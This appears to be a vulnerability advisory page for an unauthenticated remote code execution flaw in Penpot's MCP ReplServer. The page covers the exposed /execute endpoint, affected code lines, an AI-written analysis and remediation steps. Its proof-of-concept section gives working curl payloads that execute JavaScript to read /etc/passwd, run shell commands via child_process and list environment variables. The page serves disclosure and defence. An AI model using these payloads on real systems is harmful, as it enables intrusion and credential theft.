Severity by source
AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Primary rating from Vendor (https://github.com/penpot/penpot) · only source for this CVE.
CVSS VectorVendor: https://github.com/penpot/penpot
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Lifecycle Timeline
2DescriptionCVE.org
Summary
The MCP module's ReplServer binds to all interfaces (0.0.0.0:4403) and exposes a /execute endpoint that runs arbitrary code with zero authentication. Anyone on the network can POST JavaScript and it runs on the server. The main PenpotMcpServer was partially fixed for a similar binding issue (#8683), but ReplServer.ts was missed.
Details
mcp/packages/server/src/ReplServer.ts:89:
this.server = this.app.listen(this.port, () => {
// NO HOST ARGUMENT - Express defaults to 0.0.0.0Compare with PenpotMcpServer.ts:301 which correctly binds to this.host (default "localhost"):
this.app.listen(this.port, this.host, async () => {The /execute endpoint at ReplServer.ts:52-79:
this.app.post("/execute", async (req, res) => {
const { code } = req.body;
// No auth check. Executes code via PluginBridge.executePluginTask()
const task = new ExecuteCodePluginTask({ code });
const result = await this.pluginBridge.executePluginTask(task);No auth middleware, no token check, no nothing. POST JSON with a code field and it runs.
This was partially flagged in #8683 (March 2026), which noted that PenpotMcpServer.ts was binding to 0.0.0.0. PR #8686 attempted a fix but was closed without merging, and it only touched PenpotMcpServer.ts and vite.config.ts - ReplServer.ts wasn't in the diff. On current develop, ReplServer.ts line 89 still calls listen(this.port) with no host argument.
PoC
I ran the ReplServer with Express (matching the actual dependency) and tested from localhost and from a Docker container on the same network.
$ node server.js
REPL server started on port 4403
Bound to: :::4403
All interfaces: YESUnauthenticated code execution:
$ curl -s -X POST http://localhost:4403/execute \
-H "Content-Type: application/json" \
-d '{"code":"require(\"os\").hostname()"}'
{"success":true,"result":"kali"}
$ curl -s -X POST http://localhost:4403/execute \
-H "Content-Type: application/json" \
-d '{"code":"require(\"fs\").readFileSync(\"/etc/passwd\",\"utf8\").split(\"\\n\").slice(0,3).join(\"\\n\")"}'
{"success":true,"result":"root:x:0:0:root:/root:/usr/bin/zsh\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin"}
$ curl -s -X POST http://localhost:4403/execute \
-H "Content-Type: application/json" \
-d '{"code":"require(\"child_process\").execSync(\"id\").toString()"}'
{"success":true,"result":"uid=1000(kali) gid=1000(kali) groups=1000(kali)...\n"}
$ curl -s -X POST http://localhost:4403/execute \
-H "Content-Type: application/json" \
-d '{"code":"JSON.stringify(Object.keys(process.env).slice(0,5))"}'
{"success":true,"result":"[\"SHELL\",\"SESSION_MANAGER\",\"WINDOWID\",\"QT_ACCESSIBILITY\",\"COLORTERM\"]"}Binding verification:
$ ss -tlnp | grep 4403
LISTEN 0 511 *:4403 *:* users:(("node",pid=696955,fd=21))Listening on *:4403 - all interfaces.
Remote access from Docker container:
$ docker exec penpot-backend curl -s http://172.18.0.1:4403/
REPL Server - Penpot MCP (no auth)Reachable from any container on the Docker network.
Impact
Unauthenticated RCE on any machine running the MCP module. Read files, execute commands, dump environment variables (which often contain database credentials, API keys, secrets). The MCP module isn't part of the default Docker deployment, but developers and teams using the MCP integration for AI-assisted design work would run it locally. In shared development environments or CI/CD, the exposed port is reachable from the network.
Suggested fix
Two lines:
- Add a
hostparameter to the listen call inReplServer.ts:89:
this.server = this.app.listen(this.port, 'localhost', () => {- Add authentication to the
/executeendpoint. Even a shared secret from an environment variable would be better than nothing.
AnalysisAI
Unauthenticated remote code execution in Penpot MCP module's ReplServer (npm @penpot/mcp < 2.15.0) allows anyone on the adjacent network to POST arbitrary JavaScript to a /execute endpoint and have it executed by the Node.js process. The flaw stems from Express defaulting the listen() bind address to 0.0.0.0 instead of localhost, combined with a complete absence of authentication on the REPL endpoint. No public exploit identified at time of analysis beyond the reporter's working PoC included in the GHSA advisory.
Technical ContextAI
Penpot is an open-source design and prototyping platform; its MCP (Model Context Protocol) module exposes integrations used for AI-assisted design workflows and is shipped as the npm package @penpot/mcp. The vulnerable component is ReplServer.ts, an Express-based HTTP server that calls this.app.listen(this.port, ...) without a host argument - Express then binds to 0.0.0.0, making the service reachable on every network interface rather than only loopback. The /execute route accepts a JSON body with a code field and passes it to PluginBridge.executePluginTask() via an ExecuteCodePluginTask, evaluating it inside the server's Node.js context with full access to require, child_process, fs, and process.env. This maps cleanly to CWE-749 (Exposed Dangerous Method or Function): an internal-only debugging/REPL surface was inadvertently exposed without any access control, and a sibling component (PenpotMcpServer.ts) was already patched for the same binding mistake in issue #8683 while ReplServer.ts was overlooked.
RemediationAI
Vendor-released patch: upgrade @penpot/mcp to 2.15.0 or later (npm install @penpot/mcp@2.15.0), which is the fixed version per the GHSA advisory at https://github.com/advisories/GHSA-22qr-rp27-j9wm. Until upgrade is possible, bind the REPL server to loopback by editing mcp/packages/server/src/ReplServer.ts line 89 to pass 'localhost' (or 127.0.0.1) as the host argument to app.listen, mirroring the fix already applied in PenpotMcpServer.ts at line 301. As a network-layer compensating control, block inbound TCP/4403 at the host firewall (iptables/nftables/Windows Defender Firewall) for all non-loopback interfaces, and ensure Docker port mappings do not publish 4403; the trade-off is that any legitimate cross-host MCP REPL usage will break, which is acceptable since the endpoint was never intended for remote use. Adding a shared-secret token check on /execute is a useful defense-in-depth step but should not substitute for the bind fix, since a token alone still exposes the attack surface to brute-force and credential leakage.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-749 – Exposed Dangerous Method or Function
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-44700
GHSA-22qr-rp27-j9wm